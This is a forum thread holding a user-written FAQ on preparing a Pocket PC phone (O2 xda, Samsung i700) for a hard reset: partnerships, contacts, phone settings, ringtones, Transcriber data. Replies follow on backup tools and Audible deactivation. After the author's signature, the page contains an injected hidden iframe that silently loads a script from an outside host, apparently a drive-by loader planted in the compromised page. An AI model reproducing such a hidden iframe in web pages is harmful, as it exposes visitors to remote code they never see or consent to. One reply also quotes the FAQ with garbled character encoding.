+ Reply to Thread

What do I need to check before I do my first Hard Reset?

The purpose of this FAQ is to help those of you facing your first hard reset. When I bit the bullet and decided that it had to be done, I was very worried as to what was actually going to happen to my device or what data I was potentially going to lose. So in the spirit that being forewarned is forearmed, here is a list that may help you prepare yourself for your dreaded first hard reset. Text in inverted commas relates to menu choices that can be selected on your PPCPE, e.g. 'Start, Settings' would take you to the main settings screen.

Disclaimer: I apologise but I can't be held responsible if I’ve missed anything off the list and you lose some data. Please let me know if you have lost a setting that is not covered, and I’ll edit the FAQ. I am not going to apologise for my English spelling !
    rgds, Alex.

Partnership name
    If you sync with ActiveSync, you’ll already know that a partnership needs to be created. However, be careful. When you first connect after a hard reset, the partnership wizard on your PC thinks that the freshly reset device is a new connection. It creates a new partnership, which if your device name is the same as the last, will have a numbered appendage, e.g. Pocket_PC2. To avoid this, before you cradle your device for the first time after a reset, follow these steps:
     Open ActiveSync on its own and do not cradle your device.
     Check that your old partnership is displayed in the main ActiveSync window. If it is not, select ‘File, Mobile Device’ and select your old partnership.
     Select ‘File, Delete Partnership’
     If you have a synchronised files folder (e.g. Pocket_PC My Documents), it will ask you if you want to delete this. Say ‘No’.
     Now cradle your device and set up a new partnership.
    Attention: If you have changed the name of your device ID (e.g. From Pocket_PC to My_xda or whatever) then you must ensure that the new device name is set up before you create the new partnership. See Device Name below.
    Attention: Do not worry about your links to Microsoft Outlook and your stored contacts/calendar/tasks, etc. information. The new partnership will continue to recognise and synchronise with this.

Device name
    Your device ID will be reset to “Pocket_PC”. If you haven’t changed this, don’t worry. If you have, the setting is found in ‘Start, Settings, System tab, About, Device ID, Device Name’. If you want a non-standard device name, do this (after the reset) before you create your partnership again.

Contacts/Appointments
    There are a couple of ways of saving your contacts and appointments:
    Using Permanent Save
    Permanent Save backs up your contacts or appointments into non-volatile ROM. This will not be touched by a hard reset. To use Permanent Save, go to ‘Start, Settings, System tab, Permanent Save’. Select the tick boxes for the option you want to backup to ROM. This will appear to do nothing. Don’t worry. After you have reset, return to this page and select the tick boxes again. This will then restore the contacts or appointments.
    Attention: You must select this before the hard reset, or nothing will be placed into ROM.
    Using Outlook (via ActiveSync)
    Synchronise your contacts and or appointments into Outlook. When you have setup your partnership after the reset, ActiveSync will take care of the rest and reinstall your contacts and appointments.
    Third option – as yet untried
    Highly theoretical – I suppose if you know which database these are stored in, you could back that up. I have not tried this approach so no help here. Comments welcome.

Contacts default country and dialling code
    The default country to use for the address drop down in Contacts will be reset to the United States. Fine if you live there, but if you don’t, you’ll have to reset this by going to Tools, Options from within the Contacts main screen. You also have the option there to set a default area code for use within Contacts, but I can’t see the point of this. All mobile telephone dialling in the UK has to be done with the full area code anyway, but maybe not in other countries.

Phone
    Voicemail number setting
     The number your phone uses to access your provider’s voicemail. Write this down! Go to ‘Start, Settings, Phone, Services tab, Voicemail and SMS, Get settings…’ Write down the voicemail number. My SMS dial up number was restored, I think from my SIM card, but maybe not if you’re on another carrier.
    Phone Call logs are cleared
     All your outgoing, incoming and missed call logs are cleared (From Phone, Call Log). I don’t know a way of saving these easily apart from writing down the info, but then you couldn’t reinstall after the reset anyway! You will also lose the total call time (in 'Phone, Call log, Tools, Options'). Write this down if you are keeping tabs on your monthly call time elapsed. I assume there’s a database file somewhere that could be backed up. More investigation required, hints welcome.
    Speed dial numbers are erased
     Any numbers you copied into your speed dial locations (from ‘Phone, Speed Dial’) will be lost. Write down or memorise.

Internet connections, settings and dialling locations
     Any third party internet connections you have setup will be lost. With the O2 xda, these are set up again after the reset by their own program that runs on startup. Therefore, I’ve never really had to worry about this. However, there appears to be the same sort of ROM backup for connections as there is for Contacts. Go to ‘Start, Settings, System tab, Permanent Save, Connections tab’. I have never used this, so am not going to comment! Anyone with experience is welcome to let me know and I’ll edit the FAQ.
     Dialling Locations (your locations, area and country code). Any changes you have made to this setting (found in ‘Start, Settings, Connections tab, Connections, Dialing locations’ will be reset. Write down or remember your settings.

Inbox
    Third party Inbox accounts (e.g. Softhome.net)
     Any third party Inbox email accounts you have setup will be lost. Although I haven’t tried it myself, I think the Permanent Save feature described above in the Contacts section will save this, but no promises!
    Non-default Inbox Option settings
     These will be lost. This includes ‘Keep copy of sent mail in Sent folder’, ‘Save attachments to storage card’, etc. To check yours, open the Inbox, then go to ‘Tools, Options’ and check the four tabs. My SMS dial up number was restored, I think from my SIM card, but maybe not if you’re on another carrier.
    SMS messages are lost
     Any SMS messages in your Inbox will be lost. I don’t know a way around this one, but there must be a database somewhere.

Applications
     Pocket Word and Excel forget if you have told them to save to Storage Card. This needs to be reset in each application’s ‘Tools, Options’ menu.
    Attention: For this to apply to all documents, you must access this ‘Tools, Options’ menu from the document file opening screen, not from within a document.
     All third party application settings, e.g. Battery Bar icons. You will need to reinstall any third party apps you have installed anyway. This is easy. What is not so easy is remembering all your settings. These need to be studied and notes made before the reset.

Non-default ‘Start, Settings’ settings
    Apart from the settings specifically mentioned above, all the non-default settings stored in ‘Start, Settings’ will be lost. I’m not sure that there’s a good way to back these up, short of studying them beforehand and making notes. Sorry! The ones that most annoyed me were the ‘Input’ settings (various tabs, but especially the word completion options), The ‘Menu’ format, ‘Sounds and Notifications’, especially the ‘Notifications tab’.

Today Menu Owner info
    I doubt you need to write this down – it’s the xda you’re hard resetting, not yourself.

Ringtones
    Any third party ringtones (*.wav) that you have installed in My Device\Windows\Rings. Save these onto your storage card or your PC. You’ll also need to reassign them to your various ring types to make them work again (‘Start, Settings, Phone’).

Windows Media Player
    Playlists
     If you store your playlists in My Device\My Documents (the default location) they will vanish. Store them on your storage card – WMP can still see them wherever they are. I find it is better practise to do this anyway.
    Skins
     Any skins that you have copied to your device (into My device\Program Files\Windows Media Player\skindirectories) for WMP will be lost. Ensure they are on your PC or your storage card. Copy them back to the directory above after the reset.

Transcriber settings
    If you use Transcriber for input, you’ll probably have sat there for a couple of hours doing the letter shapes (teaching the device how you write). This will all be lost (yes, I learnt the hard way!). To avoid this, go to Transcriber mode. Select the small letter ‘a’ with the dots around it (not the one in the black box). Select File and then save your settings somewhere i.e. on to the Storage Card or into a synchronised folder that will be backed up. When you reset the device, you’ll have to reload this settings file (reverse procedure above).

The Time and Date
    Well durrrrr. Seriously, this might be important if you don’t have a watch to hand (or should that be ‘to wrist’?).

AvantGo profile
    On my first hard reset, my AvantGo profile took a bit of a bullying from a rogue profile set up by ActiveSync. A guest profile was created that overrode my own profile even though the guest profile was disabled. I wonder if this was more to do with my messing it up as it didn’t happen on my next hard reset. However, it might be worth remembering your AvantGo profile name (see ActiveSync, Options, Avantgo Connect, Settings’ select ‘My AvantGo (sync.avantgo.com:80)’, Properties. Write down your account name. If you get any grief with this, post to the forum and I’ll try and help out.

Main Memory storage
    Anything that you have put into memory (i.e. not on your storage card), e.g. Today screen theme files in My Documents, third party applications installed in Main Memory, etc.

I’m open to suggestions and comments. Let me know if there’s anything missing or any better ways of doing things (send me a private message).

Best rgds,
    Alex de Salis.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Is there a good 3rd party software product that will do a COMPLETE backup of the PPC (e.g. like I can do in Windows/XP on my notebook PC)? I want something that would backup EVERYTHING, so that once I do a hard reset (or for some other reason I want to restore from a previous backup) I can simply say RESTORE the full backup. I'm assuing the SD Backup in the PPC does not do this.

Editor and Site Administrator Convergent's Avatar

Benefit of not doing that

There are apps that will do this... hopefully someone will chime in with the answer. I haven't looked at that for the following reason. I like to periodically refresh the system (i.e. flush all the apps and rebuild) because I'm constantly installing and removing apps.... and we all know about how windows doesn't handle that well. I will tell you that Outlook sync does put all your data back.... including anything in the "files" folder on your desktop that you normally sync. The only thing you have to do is reinstall the apps. If you have an SD card with all your big things like music, maps, and photos.... they don't get wiped out during the hard reset.
    Mike - Been Converged?

backing up call logs/sms

Hi, has anyone been able to find a away to backup/restore call logs and sms messages? Any help would be appreciated.
    thanks,
    -lux

Igot Samsung i700, but I do not have "Permanent Save"
    option in the "Settings->Syatem" tab or anywhere.
    Is there a way to invoke it from the File Explorer?
    Where is that located?

Thanks,
    ==========================
    Contacts/Appointments
    There are a couple of ways of saving your contacts and appointments:
    „X Using Permanent Save
    Permanent Save backs up your contacts or appointments into non-volatile ROM. This will not be touched by a hard reset. To use Permanent Save, go to ¡¥Start, Settings, System tab, Permanent Save¡¦. Select the tick boxes for the option you want to backup to ROM. This will appear to do nothing. Don¡¦t worry. After you have reset, return to this page and select the tick boxes again. This will then restore the contacts or appointments.
    Attention: You must select this before the hard reset, or nothing will be placed into ROM.
    ==========================

Somewhat Converged

Lightbulb Deactivate Audible.com before hard reset

This is a great posting!

Also note if you listed to Audible books on your i700, Audible only allows three devices to be activated at a time. A hard reset erases the activation information stored on your device so you can't deactivate it after, so re-activating uses up another slot. Fills up fast. Their customer service can deactivate everything, but its a pain to go through.

Nutshell: Don't forget to de-activate your device from Audible before a hard reset.

Backup Program

I use "Pocket Backup" to save my data and settings. It is a program that came free with my Samsung i700, but I had to install it. It seems to work OK. I do not have the "permanent save" feature on my i700 under start, settings...